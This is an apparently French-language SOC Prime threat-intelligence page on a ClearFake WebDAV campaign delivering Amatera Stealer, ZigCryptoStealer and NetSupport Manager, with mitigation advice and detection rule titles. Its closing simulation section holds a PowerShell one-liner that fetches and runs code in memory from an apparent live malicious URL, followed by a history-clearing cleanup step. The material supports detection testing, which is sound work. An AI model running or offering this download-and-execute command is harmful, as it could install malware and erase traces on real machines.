SOC Prime Bias: High

09 Sep 2026 10:12 UTC

La chaîne d’infection ClearFake WebDAV livre Amatera Stealer, ZigCryptoStealer et NetSupport Manager

Author Photo
SOC Prime Team linkedin icon Suivre
La chaîne d’infection ClearFake WebDAV livre Amatera Stealer, ZigCryptoStealer et NetSupport Manager
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une campagne pilotée par ClearFake abuse de WebDAV et des Cloudflare Workers pour distribuer plusieurs charges utiles malveillantes. La charge utile principale, Amatera stealer, est conçue pour exfiltrer des identifiants et des données liées aux cryptomonnaies. Des charges utiles supplémentaires incluent ZigCryptoStealer livré via un chargeur NativeAOT et des instances non autorisées de NetSupport Manager utilisées pour établir un accès à distance.

Enquête

Cisco Talos a enquêté sur une exécution suspecte de DLL basée sur WebDAV dans une organisation gouvernementale ukrainienne. L’analyse a révélé deux chaînes d’infection distinctes : l’une utilisant un pf.ch chargeur pour déployer ZigCryptoStealer et un proxy inverse basé sur Go, et une autre utilisant un verification.google chargeur pour installer NetSupport Manager.

Atténuation

Les organisations devraient restreindre l’exécution depuis les chemins WebDAV et UNC et surveiller les comportements anormaux de rundll32.exe . Des contrôles EDR robustes devraient être utilisés pour détecter des techniques telles que le creux de DLL et le piétinage des modules. Les équipes de sécurité devraient également surveiller l’usage non autorisé de NetSupport Manager et l’activité réseau suspecte liée à la blockchain.

Réponse

Si une activité malveillante est détectée, les points d’extrémité affectés devraient être isolés immédiatement pour éviter une exfiltration supplémentaire de données. Les intervenants devraient effectuer une analyse forensic de la mémoire pour identifier les malwares résidents tels que Amatera. Les équipes de sécurité devraient aussi rechercher l’exécution de DLL basée sur WebDAV et une activité PowerShell inhabituelle à travers l’environnement.

Flux d’attaque

Nous mettons toujours à jour cette partie.

Détections

Chaînes PowerShell suspectes (via powershell)

Équipe de SOC Prime
08 Sep 2026

LOLBAS Conhost (via cmdline)

Équipe de SOC Prime
08 Sep 2026

Indicateurs possibles d’obfuscation PowerShell (via powershell)

Équipe de SOC Prime
08 Sep 2026

Abus possible de Telegram comme canal de commande et contrôle (via dns_query)

Équipe de SOC Prime
08 Sep 2026

Commande et contrôle suspect par requête DNS de domaine de premier niveau (TLD) inhabituel (via dns)

Équipe de SOC Prime
08 Sep 2026

IOC (SourceIP) à détecter : chaîne d’infection WebDAV ClearFake délivre Amatera stealer, ZigCryptoStealer, et NetSupport Manager

Règles IA de SOC Prime
08 Sep 2026

IOC (DestinationIP) à détecter : chaîne d’infection WebDAV ClearFake délivre Amatera stealer, ZigCryptoStealer, et NetSupport Manager

Règles IA de SOC Prime
08 Sep 2026

Communication C2 sur WebSocket Secure avec Dubbedmuch pour exfiltration de données [Proxy]

Règles IA de SOC Prime
08 Sep 2026

Détecter le téléchargement et l’exécution de script PowerShell de NetSupport Manager [Windows Powershell]

Règles IA de SOC Prime
08 Sep 2026

Exécution de DLL WebDAV via rundll32.exe [Création de processus Windows]

Règles IA de SOC Prime
08 Sep 2026

Exécution de simulation

Prérequis : le contrôle préalable de télémétrie et de référence doit être réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Les exemples abstraits ou non liés mèneront à un mauvais diagnostic.

  • Récit d’attaque et commandes : L’adversaire simule une chaîne d’infection « ClearFake ». Le but est de déployer l’outil d’accès à distance NetSupport Manager pour établir la persistance et le contrôle à distance. Pour éviter la détection basée sur les signatures de téléchargements de fichiers, l’attaquant utilise un « one-liner » PowerShell qui récupère une charge utile JavaScript/PowerShell à partir d’un serveur C2 distant (https://kr.cedar2glanz.ru/jewel.js) et l’exécute directement dans le tampon mémoire à l’aide de Invoke-Expression. Cette technique laisse une empreinte minimale sur le disque.

  • Script de test de régression :

    # Script de simulation : Imite l'exécution de la charge utile de la chaîne d'infection ClearFake
    # AVERTISSEMENT : Ce script utilise l'URL malveillante spécifique définie dans la règle de détection pour déclencher une alerte.
    
    $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js"
    Write-Host "[+] Simulation du téléchargement et de l'exécution PowerShell malveillants..." -ForegroundColor Yellow
    
    # Cette commande imite le modèle exact : URL + IEX/Invoke-Expression
    # Nous utilisons un bloc try/catch car l'URL est en fait inaccessible/morte, 
    # mais la LIGNE DE COMMANDE DU PROCESSUS sera quand même enregistrée.
    try {
        Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl)
    } catch {
        Write-Host "[!] Commande exécutée (Erreur réseau attendue, mais la télémétrie devrait être générée)." -ForegroundColor Cyan
    }
  • Commandes de nettoyage :

    # Aucun fichier n'est créé par cette simulation spécifique car il s'agit d'un test d'exécution en mémoire.
    # Cependant, nous effaçons l'historique des commandes pour supprimer les traces de la session utilisateur locale.
    Clear-History
    Write-Host "[+] Nettoyage terminé. Aucun artefact laissé sur le disque." -ForegroundColor Green